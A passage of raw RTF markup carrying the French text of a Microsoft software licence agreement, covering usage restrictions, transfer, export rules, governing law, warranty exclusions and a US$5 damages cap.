conc\\'e9\\loch\\f39 \\hich\\f39 d\\'e9\\loch\\f39 sous licence, pas vendu. Ce contrat vous octroie uniquement certains droits d\\hich\\f39 \\rquote \\loch\\f39 \\hich\\f39 utilisation du logiciel. Microsoft se r\\'e9\\loch\\f39 \\hich\\f39 serve tous les autres droits. \\'c0\\loch\\f39 \\hich\\f39 moins que la loi en vigueur vous conf\\'e8\\loch\\f39 re davantage d\\hich\\af39\\dbch\\af13\\loch\\f39 e droits nonobstant cette limitation, vous pouvez utiliser le logiciel uniquement tel qu\\hich\\f39 \\rquote \\loch\\f39 \\hich\\f39 explicitement autoris\\'e9 \\loch\\f39 \\hich\\f39 dans le pr\\'e9\\loch\\f39 \\hich\\f39 sent accord. \\'c0\\loch\\f39 cette fin, vous devez respecter les restrictions techniques du logiciel qui autorisent uniquement son utilisation de \\hich\\af39\\dbch\\af13\\loch\\f39 c \\hich\\af39\\dbch\\af13\\loch\\f39 \\hich\\f39 ertaines fa\\'e7\\loch\\f39 ons. Vous n\\hich\\f39 \\rquote \\'ea\\loch\\f39 \\hich\\f39 tes pas autoris\\'e9\\loch\\f39 \\hich\\f39 \\'e0\\~\\loch\\f39 : \\par {\\listtext\\pard\\plain\\ltrpar \\s25 \\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\lang1036\\langfe1033\\loch\\af3\\hich\\af3\\dbch\\af13\\langnp1036\\insrsid7368928 \\loch\\af3\\dbch\\af13\\hich\\f3 \\'b7\\tab}}\\pard\\plain \\ltrpar \\s25\\ql \\fi-363\\li720\\ri0\\sb120\\sa120\\nowidctlpar\\jclisttab\\tx720\\wrapdefault\\aspalpha\\aspnum\\faauto\\ls1\\adjustright\\rin0\\lin720\\itap0\\pararsid7368928 \\rtlch\\fcs1 \\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\fs19\\lang1033\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 {\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\lang1036\\langfe1033\\dbch\\af13\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 contourner les limitations techniques du logiciel ; \\par {\\listtext\\pard\\plain\\ltrpar \\s25 \\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\lang1036\\langfe1033\\loch\\af3\\hich\\af3\\dbch\\af13\\langnp1036\\insrsid7368928 \\loch\\af3\\dbch\\af13\\hich\\f3 \\'b7\\tab}\\hich\\af39\\dbch\\af13\\loch\\f39 \\hich\\f39 reconstituer la logique du logiciel, le d\\'e9\\loch\\f39 \\hich\\f39 compiler ou le d\\'e9\\loch\\f39 \\hich\\f39 sassembler, sauf dans la mesure o\\'f9\\loch\\f39 \\hich\\f39 ces op\\'e9\\loch\\f39 \\hich\\f39 rations seraient express\\'e9\\loch\\f39 \\hich\\f39 ment autoris \\'e9\\loch\\f39 \\hich\\f39 es par la r\\'e9\\loch\\f39 gle\\hich\\af39\\dbch\\af13\\loch\\f39 \\hich\\f39 mentation applicable nonobstant la pr\\'e9\\loch\\f39 sente limitation ; \\par {\\listtext\\pard\\plain\\ltrpar \\s25 \\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\lang1036\\langfe1033\\loch\\af3\\hich\\af3\\dbch\\af13\\langnp1036\\insrsid7368928 \\loch\\af3\\dbch\\af13\\hich\\f3 \\'b7\\tab}\\hich\\af39\\dbch\\af13\\loch\\f39 \\hich\\f39 faire plus de copies du logiciel que sp\\'e9\\loch\\f39 \\hich\\f39 cifi\\'e9\\loch\\f39 \\hich\\f39 dans ce contrat ou par la r\\'e9\\loch\\f39 \\hich\\f39 glementation applicable, nonobstant la pr\\'e9\\loch\\f39 sente limitation ; \\par {\\listtext\\pard\\plain\\ltrpar \\s25 \\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\lang1036\\langfe1033\\loch\\af3\\hich\\af3\\dbch\\af13\\langnp1036\\insrsid7368928 \\loch\\af3\\dbch\\af13\\hich\\f3 \\'b7\\tab}\\hich\\af39\\dbch\\af13\\loch\\f39 publier le logiciel pour que d \\hich\\f39 \\rquote \\loch\\f39 autres le copient ; \\par {\\listtext\\pard\\plain\\ltrpar \\s25 \\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\lang1036\\langfe1033\\loch\\af3\\hich\\af3\\dbch\\af13\\langnp1036\\insrsid7368928 \\loch\\af3\\dbch\\af13\\hich\\f3 \\'b7\\tab}\\hich\\af39\\dbch\\af13\\loch\\f39 louer o\\hich\\af39\\dbch\\af13\\loch\\f39 \\hich\\f39 u pr\\'ea\\loch\\f39 ter le logiciel ; ou \\par {\\listtext\\pard\\plain\\ltrpar \\s25 \\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\lang1036\\langfe1033\\loch\\af3\\hich\\af3\\dbch\\af13\\langnp1036\\insrsid7368928 \\loch\\af3\\dbch\\af13\\hich\\f3 \\'b7\\tab}\\hich\\af39\\dbch\\af13\\loch\\f39 utiliser le logiciel pour des services d\\hich\\f39 \\rquote \\loch\\f39 \\hich\\f39 h\\'e9\\loch\\f39 bergement commercial. \\par {\\listtext\\pard\\plain\\ltrpar \\s1 \\rtlch\\fcs1 \\ab\\af39\\afs20 \\ltrch\\fcs0 \\b\\fs20\\loch\\af39\\hich\\af39\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 3.\\tab}}\\pard\\plain \\ltrpar\\s1\\ql \\fi-357\\li357\\ri0\\sb120\\sa120\\nowidctlpar \\jclisttab\\tx360\\wrapdefault\\aspalpha\\aspnum\\faauto\\ls2\\outlinelevel0\\adjustright\\rin0\\lin357\\itap0\\pararsid7368928 \\rtlch\\fcs1 \\ab\\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\b\\fs19\\lang1033\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 { \\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 COPIE DE SAUVEGARDE.}{\\rtlch\\fcs1 \\ab0\\af39\\afs20 \\ltrch\\fcs0 \\b0\\fs20\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 }{\\rtlch\\fcs1 \\ab0\\af39\\afs20 \\ltrch\\fcs0 \\b0\\fs20\\lang1036\\langfe1033\\dbch\\af13\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 \\hich\\f39 Vous \\'ea\\loch\\f39 \\hich\\f39 tes autoris\\'e9\\loch\\f39 \\hich\\f39 \\'e0\\loch\\f39 effectuer une copie de sauvegarde du logiciel. Vous ne pouvez l\\hich\\f39 \\rquote \\loch\\f39 \\hich\\f39 utiliser que dans le but de r\\'e9\\loch\\f39 installer le logiciel. \\par {\\listtext\\pard\\plain\\ltrpar \\s1 \\rtlch\\fcs1 \\ab\\af39\\afs20 \\ltrch\\fcs0 \\b\\fs20\\lang1036\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af13\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 4.\\tab}}{\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\lang1036\\langfe1033\\dbch\\af13\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 DOCUMENTATION.}{\\rtlch\\fcs1 \\ab0\\af39\\afs20 \\ltrch\\fcs0 \\b0\\fs20\\lang1036\\langfe1033\\dbch\\af13\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 Tout utilisateur disposant d\\hich\\f39 \\rquote \\loch\\f39 \\hich\\f39 un acc\\'e8\\loch\\f39 \\hich\\f39 s valide \\'e0\\loch\\f39 \\hich\\f39 votre ordinateur ou \\'e0\\loch\\f39 \\hich\\f39 votre r\\'e9\\loch\\f39 \\hich\\f39 seau interne peut copier et utiliser la documentation \\'e0\\loch\\f39 \\hich\\f39 des fins de r\\'e9\\loch\\f39 \\hich\\f39 f\\'e9\\loch\\f39 rence interne. \\par {\\listtext\\pard\\plain\\ltrpar \\s1 \\rtlch\\fcs1 \\ab\\af39\\afs20 \\ltrch\\fcs0 \\b\\fs20\\loch\\af39\\hich\\af39\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 5.\\tab}}{\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 \\hich\\f39 TRANSFERT \\'c0\\loch\\f39 UN AUTRE DISPOSITIF.}{\\rtlch\\fcs1 \\ab0\\af39\\afs20 \\ltrch\\fcs0 \\b0\\fs20\\dbch\\af13\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 }{\\rtlch\\fcs1 \\ab0\\af39\\afs20 \\ltrch\\fcs0 \\b0\\fs20\\lang1036\\langfe1033\\dbch\\af13\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 \\hich\\f39 Vous pouvez d\\'e9\\loch\\f39 sinstaller le logiciel pu\\hich\\af39\\dbch\\af13\\loch\\f39 is l\\hich\\f39 \\rquote \\loch\\f39 installer sur un autre dispositif pour votre propre usage. Vous n\\hich\\f39 \\rquote \\'ea\\loch\\f39 \\hich\\f39 tes pas autoris\\'e9\\loch\\f39 \\hich\\f39 \\'e0\\loch\\f39 \\hich\\f39 proc\\'e9\\loch\\f39 der ainsi pour partager cette licence. \\par {\\listtext\\pard\\plain\\ltrpar \\s1 \\rtlch\\fcs1 \\ab\\af39\\afs20 \\ltrch\\fcs0 \\b\\fs20\\lang1036\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af13\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 6.\\tab}}{\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\lang1036\\langfe1033\\dbch\\af13\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 \\hich\\f39 TRANSFERT \\'c0\\loch\\f39 UN TIERS.}{\\rtlch\\fcs1 \\ab0\\af39\\afs20 \\ltrch\\fcs0 \\b0\\fs20\\lang1036\\langfe1033\\dbch\\af13\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 \\hich\\f39 Le premier utilisateur du logiciel doit le transf\\'e9\\loch\\f39 \\hich\\f39 rer, ainsi que le pr\\'e9\\loch\\f39 sent contrat, directement\\hich\\af39\\dbch\\af13\\loch\\f39 \\hich\\f39 \\'e0\\loch\\f39 \\hich\\f39 un tiers. Avant le transfert, le tiers doit reconna\\'ee\\loch\\f39 tre que cet accord s\\hich\\f39 \\rquote \\loch\\f39 \\hich\\f39 applique au transfert et \\'e0\\loch\\f39 l\\hich\\f39 \\rquote \\loch\\f39 \\hich\\f39 utilisation du logiciel. Le premier utilisateur doit d\\'e9\\loch\\f39 \\hich\\f39 sinstaller le logiciel avant de le transf\\'e9\\loch\\f39 \\hich\\f39 rer s\\'e9\\loch\\f39 \\hich\\f39 par\\'e9\\loch\\f39 ment du dispositif. Le premier utilisateur \\hich\\af39\\dbch\\af13\\loch\\f39 n}{\\rtlch\\fcs1 \\ab0\\af39\\afs20 \\ltrch\\fcs0 \\cs29\\b0\\fs20\\lang1036\\langfe1033\\dbch\\af13\\langnp1036\\insrsid7368928 \\loch\\af39\\dbch\\af13\\hich\\f39 \\rquote \\loch\\f39 \\hich\\f39 est pas autoris\\'e9\\loch\\f39 \\hich\\f39 \\'e0\\loch\\f39 en conserver une copie.}{\\rtlch\\fcs1 \\ab0\\af39\\afs20 \\ltrch\\fcs0 \\b0\\fs20\\lang1036\\langfe1033\\dbch\\af13\\langnp1036\\insrsid7368928 \\par {\\listtext\\pard\\plain\\ltrpar \\s1 \\rtlch\\fcs1 \\ab\\af39\\afs20 \\ltrch\\fcs0 \\b\\fs20\\lang1036\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af13\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 7.\\tab}}{\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\lang1036\\langfe1033\\dbch\\af13\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 \\hich\\f39 RESTRICTIONS \\'c0\\loch\\f39 L\\hich\\f39 \\rquote \\loch\\f39 EXPORTATION.}{\\rtlch\\fcs1 \\ab0\\af39\\afs20 \\ltrch\\fcs0 \\b0\\fs20\\lang1036\\langfe1033\\dbch\\af13\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 \\hich\\f39 Le logiciel est soumis \\'e0\\loch\\f39 \\hich\\f39 la r\\'e9\\loch\\f39 \\hich\\f39 glementation am\\'e9\\loch\\f39 \\hich\\f39 ricaine relative \\'e0\\loch\\f39 l \\hich\\f39 \\rquote \\loch\\f39 \\hich\\f39 exportation. Vous devez vous conformer \\'e0\\loch\\f39 \\hich\\f39 toutes les r\\'e9\\loch\\f39 glementations nationales et internation\\hich\\af39\\dbch\\af13\\loch\\f39 \\hich\\f39 ales relatives aux exportations concernant le logiciel. Ces r\\'e9\\loch\\f39 glementations comprennent les restrictions sur les destinations, les utilisateurs finaux et l\\hich\\f39 \\rquote \\loch\\f39 utilisation finale. Pour plus d\\hich\\f39 \\rquote \\loch\\f39 informations, consultez le site }{\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\b0\\fs20\\lang1036\\langfe1033\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af11\\loch\\f39 www.microsoft.com/exporting}{\\rtlch\\fcs1 \\ab0\\af39\\afs20 \\ltrch\\fcs0 \\b0\\fs20\\lang1036\\langfe1033\\dbch\\af13\\langnp1036\\insrsid7368928 . \\par {\\listtext\\pard\\plain\\ltrpar \\s1 \\rtlch\\fcs1 \\ab\\af39\\afs20 \\ltrch\\fcs0 \\b\\fs20\\lang1036\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af13\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 8.\\tab}}{\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\lang1036\\langfe1033\\dbch\\af13\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 SERV\\hich\\af39\\dbch\\af13\\loch\\f39 ICES D\\hich\\f39 \\rquote \\loch\\f39 ASSISTANCE TECHNIQUE.}{\\rtlch\\fcs1 \\ab0\\af39\\afs20 \\ltrch\\fcs0 \\b0\\fs20\\lang1036\\langfe1033\\dbch\\af13\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 \\hich\\f39 Comme ce logiciel est fourni \\'ab\\loch\\f39 \\hich\\f39 en l'\\'e9\\loch\\f39 \\hich\\f39 tat \\'bb\\loch\\f39 , nous ne fourniront aucun service d\\hich\\f39 \\rquote \\loch\\f39 assistance. \\par {\\listtext\\pard\\plain\\ltrpar \\s1 \\rtlch\\fcs1 \\ab\\af39\\afs20 \\ltrch\\fcs0 \\b\\fs20\\lang1036\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af13\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 9.\\tab}}{\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\lang1036\\langfe1033\\dbch\\af13\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 \\hich\\f39 INT\\'c9\\loch\\f39 \\hich\\f39 GRALIT\\'c9\\loch\\f39 DES ACCORDS.}{\\rtlch\\fcs1 \\ab0\\af39\\afs20 \\ltrch\\fcs0 \\b0\\fs20\\lang1036\\langfe1033\\dbch\\af13\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 \\hich\\f39 Le pr\\'e9\\loch\\f39 \\hich\\f39 sent contrat ainsi que les termes concernant les suppl\\'e9\\loch\\f39 \\hich\\f39 ments, les mises \\'e0\\loch\\f39 jour, les services Internet \\hich\\af39\\dbch\\af13\\loch\\f39 et d\\hich\\f39 \\rquote \\loch\\f39 assistance technique constituent l\\hich\\f39 \\rquote \\loch\\f39 \\hich\\f39 int\\'e9\\loch\\f39 \\hich\\f39 gralit\\'e9\\loch\\f39 des accords en ce qui concerne le logiciel et les services d\\hich\\f39 \\rquote \\loch\\f39 assistance technique. \\par {\\listtext\\pard\\plain\\ltrpar \\s1 \\rtlch\\fcs1 \\ab\\af39\\afs20 \\ltrch\\fcs0 \\b\\fs20\\lang1036\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af13\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 10.\\tab}}\\pard \\ltrpar \\s1\\ql \\fi-360\\li360\\ri0\\sb120\\sa120\\nowidctlpar\\wrapdefault\\aspalpha\\aspnum\\faauto\\ls2\\outlinelevel0\\adjustright\\rin0\\lin360\\itap0\\pararsid7368928 {\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\lang1036\\langfe1033\\dbch\\af13\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 DROIT APPLICABLE. \\par {\\listtext\\pard\\plain\\ltrpar \\s2 \\rtlch\\fcs1 \\ab\\af39\\afs20 \\ltrch\\fcs0 \\b\\fs20\\lang1036\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af13\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 a.\\tab}}\\pard\\plain \\ltrpar \\s2\\ql \\fi-363\\li720\\ri0\\sb120\\sa120\\nowidctlpar\\jclisttab\\tx720\\wrapdefault\\aspalpha\\aspnum\\faauto\\ls2\\ilvl1\\outlinelevel1\\adjustright\\rin0\\lin720\\itap0\\pararsid7368928 \\rtlch\\fcs1 \\ab\\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\b\\fs19\\lang1033\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 {\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\lang1036\\langfe1033\\dbch\\af13\\langnp1036\\insrsid7368928 \\loch\\af39\\dbch\\af13\\hich\\f39 \\'c9\\loch\\f39 tats-Unis.}{\\rtlch\\fcs1 \\ab0\\af39\\afs20 \\ltrch\\fcs0 \\b0\\fs20\\lang1036\\langfe1033\\dbch\\af13\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 \\hich\\f39 Si vous avez acquis le logiciel aux \\'c9\\loch\\f39 tats-Unis, les lois de l\\hich\\f39 \\rquote \\'c9\\loch\\f39 \\hich\\f39 tat de Washington, \\'c9\\loch\\f39 t\\hich\\af39\\dbch\\af13\\loch\\f39 ats-Unis d\\hich\\f39 \\rquote \\loch\\f39 \\hich\\f39 Am\\'e9\\loch\\f39 \\hich\\f39 rique, r\\'e9\\loch\\f39 gissent l\\hich\\f39 \\rquote \\loch\\f39 \\hich\\f39 interpr\\'e9\\loch\\f39 tation de ce contrat et s \\hich\\f39 \\rquote \\loch\\f39 \\hich\\f39 appliquent en cas de r\\'e9\\loch\\f39 \\hich\\f39 clamation pour violation dudit contrat, nonobstant les conflits de principes juridiques. La r\\'e9\\loch\\f39 \\hich\\f39 glementation du pays dans lequel vous vivez r\\'e9 \\loch\\f39 \\hich\\f39 git toutes les autres r\\'e9\\loch\\f39 c\\hich\\af39\\dbch\\af13\\loch\\f39 l\\hich\\af39\\dbch\\af13\\loch\\f39 \\hich\\f39 amations, notamment, et sans limitation, les r\\'e9\\loch\\f39 \\hich\\f39 clamations dans le cadre des lois en faveur de la protection des consommateurs, relatives \\'e0\\loch\\f39 \\hich\\f39 la concurrence et aux d\\'e9\\loch\\f39 lits. \\par {\\listtext\\pard\\plain\\ltrpar \\s2 \\rtlch\\fcs1 \\ab\\af39\\afs20 \\ltrch\\fcs0 \\b\\fs20\\lang1036\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af13\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 b.\\tab}}{\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\lang1036\\langfe1033\\dbch\\af13\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 \\hich\\f39 En dehors des \\'c9\\loch\\f39 tats-Unis.}{\\rtlch\\fcs1 \\ab0\\af39\\afs20 \\ltrch\\fcs0 \\b0\\fs20\\lang1036\\langfe1033\\dbch\\af13\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 Si vous avez acquis le logiciel dans un autre pays, les lois de ce pays s\\hich\\f39 \\rquote \\loch\\f39 appliquent. \\par {\\listtext\\pard\\plain\\ltrpar \\s1 \\rtlch\\fcs1 \\ab\\af39\\afs20 \\ltrch\\fcs0 \\b\\fs20\\lang1036\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af13\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 11.\\tab}}\\pard\\plain \\ltrpar \\s1\\ql \\fi-357\\li357\\ri0\\sb120\\sa120\\nowidctlpar\\jclisttab\\tx360\\wrapdefault\\aspalpha\\aspnum\\faauto\\ls2\\outlinelevel0\\adjustright\\rin0\\lin357\\itap0\\pararsid7368928 \\rtlch\\fcs1 \\ab\\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\b\\fs19\\lang1033\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 {\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\lang1036\\langfe1033\\dbch\\af13\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 EFFET JURIDIQUE.}{\\rtlch\\fcs1 \\ab0\\af39\\afs20 \\ltrch\\fcs0 \\b0\\fs20\\lang1036\\langfe1033\\dbch\\af13\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 \\hich\\f39 Le pr\\'e9\\loch\\f39 \\hich\\f39 sent contrat d\\'e9\\loch\\f39 crit certains droits juridiques. Vous pourriez avoir d\\hich\\f39 \\rquote \\loch\\f39 \\hich\\f39 autres droits pr\\'e9\\loch\\f39 \\hich\\f39 vus par les lois de votre pays. Vous pourriez \\'e9\\loch\\f39 galement\\hich\\af39\\dbch\\af13\\loch\\f39 \\hich\\f39 avoir des droits \\'e0\\loch\\f39 l\\hich\\f39 \\rquote \\'e9\\loch\\f39 \\hich\\f39 gard de la partie de qui vous avez acquis le logiciel. Le pr\\'e9\\loch\\f39 \\hich\\f39 sent contrat ne modifie pas les droits que vous conf\\'e8\\loch\\f39 rent les lois de votre ou pays si celles-ci ne le permettent pas. \\par {\\listtext\\pard\\plain\\ltrpar \\s1 \\rtlch\\fcs1 \\ab\\af39\\afs20 \\ltrch\\fcs0 \\b\\fs20\\lang1036\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af11\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af11\\loch\\f39 12.\\tab}}\\pard \\ltrpar\\s1\\ql \\fi-357\\li357\\ri0\\sb120\\sa120\\widctlpar \\jclisttab\\tx360\\wrapdefault\\aspalpha\\aspnum\\faauto\\ls2\\outlinelevel0\\adjustright\\rin0\\lin357\\itap0\\pararsid7368928 {\\rtlch\\fcs1 \\af39 \\ltrch\\fcs0 \\lang1036\\langfe1033\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af11\\loch\\f39 \\hich\\f39 EXCLUSIONS DE GARANTIE. Le logiciel est conc\\'e9\\loch\\f39 \\hich\\f39 d\\'e9\\loch\\f39 s\\hich\\af39\\dbch\\af11\\loch\\f39 \\hich\\f39 ous licence \\'ab\\~\\loch\\f39 en l\\hich\\f39 \\rquote \\'e9\\loch\\f39 tat\\~\\hich\\f39 \\'bb\\loch\\f39 \\hich\\f39 . Vous assumez tous les risques li\\'e9\\loch\\f39 \\hich\\f39 s \\'e0\\loch\\f39 son utilisation. }{\\rtlch\\fcs1 \\af39 \\ltrch\\fcs0 \\cs30\\lang1036\\langfe1033\\dbch\\af13\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 Microsoft n\\hich\\f39 \\rquote \\loch\\f39 accorde aucune garantie}{\\rtlch\\fcs1 \\af39 \\ltrch\\fcs0 \\lang1036\\langfe1033\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af11\\loch\\f39 ou condition}{\\rtlch\\fcs1 \\af39 \\ltrch\\fcs0 \\cs30\\lang1036\\langfe1033\\dbch\\af13\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 expresse.}{\\rtlch\\fcs1 \\af39 \\ltrch\\fcs0 \\lang1036\\langfe1033\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af11\\loch\\f39 }{\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\lang1036\\langfe1033\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af11\\loch\\f39 \\hich\\f39 Vous pouvez b\\'e9\\loch\\f39 \\hich\\f39 n\\'e9\\loch\\f39 \\hich\\f39 ficier de droits des consommateurs suppl\\'e9\\loch\\f39 mentaires ou de garanties statutaires dans le cadre du droi\\hich\\af39\\dbch\\af11\\loch\\f39 t local, que ce contrat ne peut modifier}{\\rtlch\\fcs1 \\af39 \\ltrch\\fcs0 \\lang1036\\langfe1033\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af11\\loch\\f39 \\hich\\f39 . Lorsque cela est autoris\\'e9\\loch\\f39 \\hich\\f39 par le droit local, Microsoft exclut les garanties implicites de qualit\\'e9\\loch\\f39 , d\\hich\\f39 \\rquote \\loch\\f39 \\hich\\f39 ad\\'e9\\loch\\f39 \\hich\\f39 quation \\'e0\\loch\\f39 un usage particulier et d\\hich\\f39 \\rquote \\loch\\f39 \\hich\\f39 absence de contrefa\\'e7\\loch\\f39 on. \\par }\\pard\\plain \\ltrpar\\s24\\ql \\li357\\ri0\\sb120\\sa120\\nowidctlpar\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin357\\itap0\\pararsid7368928 \\rtlch\\fcs1 \\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\fs19\\lang1033\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 {\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\b\\fs20\\lang1036\\langfe1033\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af11\\loch\\f39 POUR L\\hich\\f39 \\rquote \\loch\\f39 AUSTRALIE \\hich\\f39 \\endash \\loch\\f39 La loi australienne sur la con\\hich\\af39\\dbch\\af11\\loch\\f39 sommation (Australian Consumer Law) vous accorde des garanties statutaires qu\\hich\\f39 \\rquote \\loch\\f39 \\hich\\f39 aucun \\'e9\\loch\\f39 \\hich\\f39 l\\'e9\\loch\\f39 \\hich\\f39 ment du pr\\'e9\\loch\\f39 sent accord ne peut affecter}{\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\b\\fs20\\lang1036\\langfe1033\\dbch\\af13\\langnp1036\\insrsid7368928 . \\par {\\listtext\\pard\\plain\\ltrpar \\s1 \\rtlch\\fcs1 \\ab\\af39\\afs20 \\ltrch\\fcs0 \\b\\fs20\\lang1036\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af13\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 13.\\tab}}\\pard\\plain \\ltrpar \\s1\\ql \\fi-357\\li357\\ri0\\sb120\\sa120\\nowidctlpar\\jclisttab\\tx360\\wrapdefault\\aspalpha\\aspnum\\faauto\\ls2\\outlinelevel0\\adjustright\\rin0\\lin357\\itap0\\pararsid7368928 \\rtlch\\fcs1 \\ab\\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\b\\fs19\\lang1033\\langfe1033\\loch\\af39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 {\\rtlch\\fcs1 \\af39\\afs20 \\ltrch\\fcs0 \\fs20\\lang1036\\langfe1033\\dbch\\af13\\langnp1036\\insrsid7368928 \\hich\\af39\\dbch\\af13\\loch\\f39 LIMITATION ET EXCLUSION DE RECOURS ET DE DOMMAGES. Vous pouvez obtenir de Microsoft et de ses fournisseurs une indemnisation\\hich\\af39\\dbch\\af13\\loch\\f39 \\hich\\f39 en cas de dommages directs limit\\'e9\\loch\\f39 \\hich\\f39 e uniquement \\'e0\\loch\\f39 \\hich\\f39 hauteur de 5,00 $ US. Vous ne pouvez pr\\'e9\\loch\\f39 \\hich\\f39 tendre \\'e0\\loch\\f39 \\hich\\f39 aucune indemnisation pour les autres dommages, y compris les dommages sp\\'e9\\loch\\f39 \\hich\\f39 ciaux, indirects ou accessoires et pertes de b\\'e9 \\loch\\f39 \\hich\\f39 n\\'e9\\loch\\f39 fices. \\par }\\pard\\plain \\ltrpar\\s24\\ql \\li357\\ri0\\sb120\\sa120\\nowidctlpar\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin357\\itap0\\pararsid7368928 \\rtlch\\fcs1 \\af39\\afs19\\alang1025 